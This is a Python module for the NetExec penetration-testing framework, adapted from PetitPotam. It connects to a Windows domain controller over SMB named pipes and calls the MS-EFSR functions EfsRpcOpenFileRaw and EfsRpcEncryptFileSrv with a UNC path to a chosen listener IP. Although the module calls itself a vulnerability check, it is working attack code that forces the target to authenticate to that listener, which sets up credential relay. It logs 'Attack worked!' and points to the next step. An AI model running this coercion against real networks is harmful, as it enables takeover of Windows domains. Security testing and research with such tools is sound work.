#!/usr/bin/env python3 # -*- coding: utf-8 -*- # From https://github.com/topotam/PetitPotam # All credit to @topotam # Module by @mpgn_x64 import sys from impacket import system_errors from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD, PCHAR, RPC_SID, LPWSTR from impacket.dcerpc.v5.rpcrt import ( DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE, ) from impacket.uuid import uuidtup_to_bin class NXCModule: name = "petitpotam" description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True def options(self, context, module_options): """ LISTENER IP of your listener PIPE Default PIPE (default: lsarpc) """ self.listener = "127.0.0.1" if "LISTENER" in module_options: self.listener = module_options["LISTENER"] self.pipe = "lsarpc" if "PIPE" in module_options: self.pipe = module_options["PIPE"] def on_login(self, context, connection): dce = coerce( connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, aesKey=connection.aesKey, target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain, pipe=self.pipe, do_kerberos=connection.kerberos, dc_host=connection.kdcHost, target_ip=connection.host, context=context, ) if efs_rpc_open_file_raw(dce, self.listener, context): context.log.highlight("VULNERABLE") context.log.highlight("Next step: https://github.com/topotam/PetitPotam") try: host = context.db.get_hosts(connection.host)[0] context.db.add_host( host.ip, host.hostname, host.domain, host.os, host.smbv1, host.signing, petitpotam=True, ) except Exception: context.log.debug("Error updating petitpotam status in database") class DCERPCSessionError(DCERPCException): def __init__(self, error_string=None, error_code=None, packet=None): DCERPCException.__init__(self, error_string, error_code, packet) def __str__(self): key = self.error_code if key in system_errors.ERROR_MESSAGES: error_msg_short = system_errors.ERROR_MESSAGES[key][0] error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] return "EFSR SessionError: code: 0x%x - %s - %s" % ( self.error_code, error_msg_short, error_msg_verbose, ) else: return f"EFSR SessionError: unknown error code: 0x{self.error_code:x}" ################################################################################ # STRUCTURES ################################################################################ class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT): align = 1 structure = (("Data", "20s"),) class EFS_EXIM_PIPE(NDRSTRUCT): align = 1 structure = (("Data", ":"),) class EFS_HASH_BLOB(NDRSTRUCT): structure = ( ("Data", DWORD), ("cbData", PCHAR), ) class EFS_RPC_BLOB(NDRSTRUCT): structure = ( ("Data", DWORD), ("cbData", PCHAR), ) class EFS_CERTIFICATE_BLOB(NDRSTRUCT): structure = ( ("Type", DWORD), ("Data", DWORD), ("cbData", PCHAR), ) class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT): structure = ( ("Lenght", DWORD), ("SID", RPC_SID), ("Hash", EFS_HASH_BLOB), ("Display", LPWSTR), ) class ENCRYPTION_CERTIFICATE(NDRSTRUCT): structure = ( ("Lenght", DWORD), ("SID", RPC_SID), ("Hash", EFS_CERTIFICATE_BLOB), ) class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT): align = 1 structure = ( ("Cert", DWORD), ("Users", ENCRYPTION_CERTIFICATE_HASH), ) class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT): structure = ( ("Type", DWORD), ("HASH", ENCRYPTION_CERTIFICATE_HASH_LIST), ("Certif", ENCRYPTION_CERTIFICATE), ("Blob", EFS_RPC_BLOB), ) class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT): align = 1 structure = (("Data", ":"),) ################################################################################ # RPC CALLS ################################################################################ class EfsRpcOpenFileRaw(NDRCALL): opnum = 0 structure = ( ("fileName", WSTR), ("Flag", ULONG), ) class EfsRpcOpenFileRawResponse(NDRCALL): structure = ( ("hContext", EXIMPORT_CONTEXT_HANDLE), ("ErrorCode", ULONG), ) class EfsRpcEncryptFileSrv(NDRCALL): opnum = 4 structure = (("FileName", WSTR),) class EfsRpcEncryptFileSrvResponse(NDRCALL): structure = (("ErrorCode", ULONG),) def coerce( username, password, domain, lmhash, nthash, aesKey, target, pipe, do_kerberos, dc_host, target_ip=None, context=None, ): binding_params = { "lsarpc": { "stringBinding": r"ncacn_np:%s[\PIPE\lsarpc]" % target, "MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"), }, "efsr": { "stringBinding": r"ncacn_np:%s[\PIPE\efsrpc]" % target, "MSRPC_UUID_EFSR": ("df1941c5-fe89-4e79-bf10-463657acf44d", "1.0"), }, "samr": { "stringBinding": r"ncacn_np:%s[\PIPE\samr]" % target, "MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"), }, "lsass": { "stringBinding": r"ncacn_np:%s[\PIPE\lsass]" % target, "MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"), }, "netlogon": { "stringBinding": r"ncacn_np:%s[\PIPE\netlogon]" % target, "MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"), }, } rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"]) if hasattr(rpc_transport, "set_credentials"): rpc_transport.set_credentials( username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash, aesKey=aesKey, ) if target_ip: rpc_transport.setRemoteHost(target_ip) dce = rpc_transport.get_dce_rpc() dce.set_auth_type(RPC_C_AUTHN_WINNT) dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) if do_kerberos: rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host) dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE) context.log.info(f"[-] Connecting to {binding_params[pipe]['stringBinding']}") try: dce.connect() except Exception as e: context.log.debug(f"Something went wrong, check error status => {str(e)}") sys.exit() context.log.info("[+] Connected!") context.log.info(f"[+] Binding to {binding_params[pipe]['MSRPC_UUID_EFSR'][0]}") try: dce.bind(uuidtup_to_bin(binding_params[pipe]["MSRPC_UUID_EFSR"])) except Exception as e: context.log.debug(f"Something went wrong, check error status => {str(e)}") sys.exit() context.log.info("[+] Successfully bound!") return dce def efs_rpc_open_file_raw(dce, listener, context=None): try: request = EfsRpcOpenFileRaw() request["fileName"] = f"\\\\{listener}\\test\\Settings.ini\x00" request["Flag"] = 0 dce.request(request) except Exception as e: if str(e).find("ERROR_BAD_NETPATH") >= 0: context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!") context.log.info("[+] Attack worked!") return True if str(e).find("rpc_s_access_denied") >= 0: context.log.info("[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!") context.log.info("[+] OK! Using unpatched function!") context.log.info("[-] Sending EfsRpcEncryptFileSrv!") try: request = EfsRpcEncryptFileSrv() request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00" dce.request(request) except Exception as e: if str(e).find("ERROR_BAD_NETPATH") >= 0: context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!") context.log.info("[+] Attack worked!") return True else: context.log.debug(f"Something went wrong, check error status => {str(e)}") else: context.log.debug(f"Something went wrong, check error status => {str(e)}")